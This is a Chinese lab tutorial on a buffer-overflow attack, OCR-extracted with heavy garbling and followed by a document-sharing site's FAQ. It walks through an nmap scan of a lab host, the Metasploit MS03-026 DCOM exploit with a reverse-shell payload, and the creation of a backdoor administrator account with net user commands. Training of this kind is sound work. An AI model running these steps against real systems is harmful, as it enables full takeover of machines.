缓冲区溢出攻击实验教程

1.实训目标获取B标主机的最高权限,利用远程桌面登录。理解ddos攻击的原理缓冲区溢出攻击原理一、实验环境实验环境两台预装Windows2000/XP/2003的主机,通过网络相连软件工具:metasploitfrmamework二、试验要求1、实训耍求:获取目标主机的最高权限三、实训步骤:1、攻击目标Windowsserver2003SPOWindowsServer2003Sta...2、攻击目的获取目标主机的最高权限,利用远程桌面登录并进行截图说明3、攻击开始步骤1:使用nmap对目标进行端口扫描Hom©我的电脑网上邻soInternetExplorer10.20.39.45vProfile:VScanCancenmap"T4"A"v10.20.39.45ServicesNmapOutputPorts/HostsTopologyHostDetailsScans▲nmap"T4*v10.20.39.45V1tDetailD.20.39.453.20.39.165Discoveredopenport1026/tcpon10.20.39.45CompletedSYNStealthScanat19:26,0.39selapsed(1000totalports)InitiatingServicescanat19:26Scanning8serviceson10.20.39.45CompletedServicescanat19:27,48.52selapsed(8serviceson1host)Initiating05detection(try痒1)against10.20.39.45HSE:Scriptscanning10.20.39.45.InitiatingNSEat19:27CompletedNSEat19:27,22.08selapsedWiaapscanreportfor10.20.39.45Hostis叫)(0.00016slatency).Notshown:992closedportsPORTSTATERVICEVERSIOH23/tcpopentelnetMicrosoftVBLndovisXPtelnetd80/tcpopenMicrosoftIISd6.0|-methods:OPTIONSTPACEGETHEADPOST屋IPotentiallyriskymethods:TRACEI_Seenmap.org/nsedoc/scripts/-methods|_htxp-title:\xBD\xA8\xC9\xE8\xD6\xD0135/tcpopennsrpcMicrosoftVti.ndcn7sRPC139/tcpopennettoios-ssn445/tcpopenmicroso£t-dsMicrosoft协ndans2003or2008激LLvi.'usu£L1025/tcpopennsrpcMicrosoftV^ndcnisRPC1026/tcpopennsrpcMicrosoftV^ndcnisRPC3389/tcpopenns-vi)t-serverMicrosoftTerminalServiceMACAddress:00:0C:29:18:6C:BI(VMware)Devicetype:generalpurposeTDi"i•MSIACl步骤2:目标开启135端口,可利用MS03-026漏洞进行入侵,用到的工具是metasploitfrmameworko(1)查询MS03-026漏洞所对应的溢出模块msf>searchms03-0261HatchingModulesRankDescriptionNameDisclosureDateIexploit/windows/deerpc/ws03026dcomfliw——2003-07-16greatMicrosoftRPCDCOMInterfaceOvermsf>useexploit/windows/deerpc/ms03026dcorn(2)进入此模块:有效载荷为执行特定命令,配::相关参数并显示出来msfexploit(msO3_O26_dcom)>setPAYLOADgeneric/shell_reverse_tcpPAYLOAD=>generic/shell_rever北Lcpmsfexploit(rt)sO3_O26_dcom)>setRHOST10.20.39.45RHOST=>10.20.39?45msfexploit(msO3_O26_dcom)>setLHOST10.20.39.6LHOST=>10.20.39:6-msfexploit(msO3_O26_dcom)>showoptionsModuleoptions(exploit/windows/dcerpc/ms03_026_dcom):WameCurrentSettingRequiredDescriptionRHOST10.20.39.45yesThetargetaddressRPORT135yesThetargetportPayloadoptions(generic/shell_reverse_tcp):NameCurrentSettingRequiredDescriptionLHOST10.20.39.6yesThelistenaddressLPORT4444yesThelistenportExploittarget:IdName0WindowsNTSP3-6a/2OOO/XP/2OO3Universal(4)执行攻击命令,成功进入目标系统msfexploit(ws03026doom)>exploit[*]Startedreversehandleron10.20.39.6:4444[*]TryingtargetWindowsNTSP3-6a/2OOO/ZP/2OO3Universal...[”Bindingco4d9f4ato8-7dlc-llcf-861e-0020af6e7c57:0.0@ncacn_ip_t.cp:10.20.39.45[135]...[*]Boundto4d9f4ab8-7dlc-llcf-861e-0020af6e7cS7:0.O0ncacn—ip_tcp:10.20.39.45[135]...[”Sendingexploit...[*]Commandshellsession1opened(10.20.39.6:4444->10.20.39.45:1036)ac2013-06-0816:39:01800MicrosoftWindows[版本5.2.3790])1985-2003MicrosoftCorpDOWS\system32>ipconfigWindoi(7)添加系统账号并把它加入系统管理员组中MicrosoftWindows[坂本5.2.3790])1985-2003MicrosoftCorp.DO¥S\syscew32>)netusertyktyk/addertyktyk/addE:\WINnetus命令成E:\BINDOWS\system32>netlocalgroupadministratorstyk/addnetlocalgroupadministratorstyk/add命今成功完成•__________________I________________________________________E:\¥INDOWS\systern32>(8)远程登录服务器,溢出成功E:\WIKipconi

1、当您付费下载文档后,您只拥有了使用权限,并不意味着购买了版权,文档只能用于自身使用,不得用于其他商业用途(如 [转卖]进行直接盈利或[编辑后售卖]进行间接盈利)。
2、本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供参考,付费前请自行鉴别。
3、如文档内容存在侵犯商业秘密、侵犯著作权等,请点击“举报”。

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

客服邮箱:

biganzikefu@outlook.com

所有的文档都被视为“模板”,用于写作参考,下载前须认真查看,确认无误后再购买;

文档大部份都是可以预览的,笔杆子文库无法对文档的真实性、完整性、准确性以及专业性等问题提供审核和保证,请慎重购买;

文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为依据;

如果您还有什么不清楚的或需要我们协助,可以联系客服邮箱:

biganzikefu@outlook.com

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

文秘专家
机构认证
内容提供者

1

确认删除?